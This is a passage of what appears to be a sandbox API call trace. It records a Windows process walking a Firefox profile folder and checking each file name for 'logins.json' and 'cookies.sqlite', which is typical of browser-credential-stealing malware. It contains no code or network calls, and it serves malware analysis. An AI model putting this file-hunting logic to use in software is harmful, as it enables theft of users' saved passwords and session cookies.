0x8fce90 [0160.849] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.849] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="mimeTypes.rdf" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf" [0160.849] VirtualQuery (in: lpAddress=0x926360, lpBuffer=0x2df720, dwLength=0x1c | out: lpBuffer=0x2df720*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x22000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.849] GetProcessHeap () returned 0x8e0000 [0160.849] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926360 | out: hHeap=0x8e0000) returned 1 [0160.849] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf", lpSrch="logins.json") returned 0x0 [0160.849] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf", lpSrch="cookies.sqlite") returned 0x0 [0160.849] VirtualQuery (in: lpAddress=0x8fce90, lpBuffer=0x2df72c, dwLength=0x1c | out: lpBuffer=0x2df72c*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.849] GetProcessHeap () returned 0x8e0000 [0160.849] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fce90 | out: hHeap=0x8e0000) returned 1 [0160.849] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df778 | out: lpFindFileData=0x2df778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb26740e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb26740e0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb26740e0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="minidumps", cAlternateFileName="MINIDU~1")) returned 1 [0160.849] lstrcmpiW (lpString1="minidumps", lpString2=".") returned 1 [0160.849] lstrcmpiW (lpString1="minidumps", lpString2="..") returned 1 [0160.849] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0160.849] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0160.849] lstrlenW (lpString="\\") returned 1 [0160.849] GetProcessHeap () returned 0x8e0000 [0160.849] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x926360 [0160.849] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0160.849] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.849] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0160.849] lstrlenW (lpString="minidumps") returned 9 [0160.849] GetProcessHeap () returned 0x8e0000 [0160.849] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc4) returned 0x926420 [0160.849] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.849] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="minidumps" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps" [0160.849] VirtualQuery (in: lpAddress=0x926360, lpBuffer=0x2df720, dwLength=0x1c | out: lpBuffer=0x2df720*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x22000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.849] GetProcessHeap () returned 0x8e0000 [0160.849] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926360 | out: hHeap=0x8e0000) returned 1 [0160.850] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps") returned 97 [0160.850] lstrlenW (lpString="") returned 0 [0160.850] GetProcessHeap () returned 0x8e0000 [0160.850] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc4) returned 0x924da0 [0160.850] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps" [0160.850] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps", lpString2="" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps" [0160.850] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps") returned 97 [0160.850] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps") returned 97 [0160.850] lstrlenW (lpString="\\*.*") returned 4 [0160.850] GetProcessHeap () returned 0x8e0000 [0160.850] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xcc) returned 0x8fce90 [0160.850] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps" [0160.850] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\*.*" [0160.850] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\*.*", lpFindFileData=0x2df500 | out: lpFindFileData=0x2df500*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb26740e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb26740e0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb26740e0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9a80 [0160.894] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0160.894] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df500 | out: lpFindFileData=0x2df500*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb26740e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb26740e0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb26740e0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.894] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0160.894] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0160.894] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df500 | out: lpFindFileData=0x2df500*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb26740e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb26740e0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb26740e0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0160.894] FindClose (in: hFindFile=0x8f9a80 | out: hFindFile=0x8f9a80) returned 1 [0160.895] VirtualQuery (in: lpAddress=0x8fce90, lpBuffer=0x2df4b4, dwLength=0x1c | out: lpBuffer=0x2df4b4*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.895] GetProcessHeap () returned 0x8e0000 [0160.895] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fce90 | out: hHeap=0x8e0000) returned 1 [0160.895] VirtualQuery (in: lpAddress=0x924da0, lpBuffer=0x2df4b4, dwLength=0x1c | out: lpBuffer=0x2df4b4*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.895] GetProcessHeap () returned 0x8e0000 [0160.895] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924da0 | out: hHeap=0x8e0000) returned 1 [0160.895] VirtualQuery (in: lpAddress=0x926420, lpBuffer=0x2df72c, dwLength=0x1c | out: lpBuffer=0x2df72c*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x22000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.895] GetProcessHeap () returned 0x8e0000 [0160.895] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926420 | out: hHeap=0x8e0000) returned 1 [0160.895] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0160.895] lstrlenW (lpString="\\") returned 1 [0160.895] GetProcessHeap () returned 0x8e0000 [0160.895] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x926360 [0160.895] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0160.895] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.895] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0160.895] lstrlenW (lpString="minidumps") returned 9 [0160.895] GetProcessHeap () returned 0x8e0000 [0160.895] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc4) returned 0x926420 [0160.895] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.895] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="minidumps" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps" [0160.895] VirtualQuery (in: lpAddress=0x926360, lpBuffer=0x2df720, dwLength=0x1c | out: lpBuffer=0x2df720*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x22000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.895] GetProcessHeap () returned 0x8e0000 [0160.895] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926360 | out: hHeap=0x8e0000) returned 1 [0160.895] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps", lpSrch="logins.json") returned 0x0 [0160.895] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps", lpSrch="cookies.sqlite") returned 0x0 [0160.895] VirtualQuery (in: lpAddress=0x926420, lpBuffer=0x2df72c, dwLength=0x1c | out: lpBuffer=0x2df72c*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x22000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.895] GetProcessHeap () returned 0x8e0000 [0160.895] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926420 | out: hHeap=0x8e0000) returned 1 [0160.895] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df778 | out: lpFindFileData=0x2df778*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb26740e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb26740e0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x80696ec0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="parent.lock", cAlternateFileName="PARENT~1.LOC")) returned 1 [0160.895] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0160.895] lstrlenW (lpString="\\") returned 1 [0160.895] GetProcessHeap () returned 0x8e0000 [0160.895] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x926360 [0160.896] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0160.896] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.896] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0160.896] lstrlenW (lpString="parent.lock") returned 11 [0160.896] GetProcessHeap () returned 0x8e0000 [0160.896] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc8) returned 0x926420 [0160.896] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.896] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="parent.lock" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\parent.lock") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\parent.lock" [0160.896] VirtualQuery (in: lpAddress=0x926360, lpBuffer=0x2df720, dwLength=0x1c | out: lpBuffer=0x2df720*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x22000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.896] GetProcessHeap () returned 0x8e0000 [0160.896] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926360 | out: hHeap=0x8e0000) returned 1 [0160.896] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\parent.lock", lpSrch="logins.json") returned 0x0 [0160.896] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\parent.lock", lpSrch="cookies.sqlite") returned 0x0 [0160.896] VirtualQuery (in: lpAddress=0x926420, lpBuffer=0x2df72c, dwLength=0x1c | out: lpBuffer=0x2df72c*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x22000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.896] GetProcessHeap () returned 0x8e0000 [0160.896] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926420 | out: hHeap=0x8e0000) returned 1 [0160.896] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df778 | out: lpFindFileData=0x2df778*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb43eb830, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb43eb830, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xc3b3f6e0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="permissions.sqlite", cAlternateFileName="PERMIS~1.SQL")) returned 1 [0160.896] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0160.896] lstrlenW (lpString="\\") returned 1 [0160.896] GetProcessHeap () returned 0x8e0000 [0160.896] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x926360 [0160.896] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0160.896] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.896] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0160.896] lstrlenW (lpString="permissions.sqlite") returned 18 [0160.896] GetProcessHeap () returned 0x8e0000 [0160.896] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd6) returned 0x926420 [0160.896] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.896] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="permissions.sqlite" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite" [0160.896] VirtualQuery (in: lpAddress=0x926360, lpBuffer=0x2df720, dwLength=0x1c | out: lpBuffer=0x2df720*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x22000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.896] GetProcessHeap () returned 0x8e0000 [0160.896] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926360 | out: hHeap=0x8e0000) returned 1 [0160.896] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite", lpSrch="logins.json") returned 0x0 [0160.897] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite", lpSrch="cookies.sqlite") returned 0x0 [0160.897] VirtualQuery (in: lpAddress=0x926420, lpBuffer=0x2df72c, dwLength=0x1c | out: lpBuffer=0x2df72c*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x22000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.897] GetProcessHeap () returned 0x8e0000 [0160.897] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926420 | out: hHeap=0x8e0000) returned 1 [0160.897] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df778 | out: lpFindFileData=0x2df778*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb4c1a3d0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb4c1a3d0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x82b58970, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0xa00000, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="places.sqlite", cAlternateFileName="PLACES~1.SQL")) returned 1 [0160.897] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0160.897] lstrlenW (lpString="\\") returned 1 [0160.897] GetProcessHeap () returned 0x8e0000 [0160.897] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x926360 [0160.897] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0160.897] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0160.897] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0160.897] lstrlenW (lpString="places.sqlite") returned 13 [0160.897] GetProcessHeap () returned 0x8e0000 [0160.897] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xcc) returned 0x8fce90 [0160.897] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS 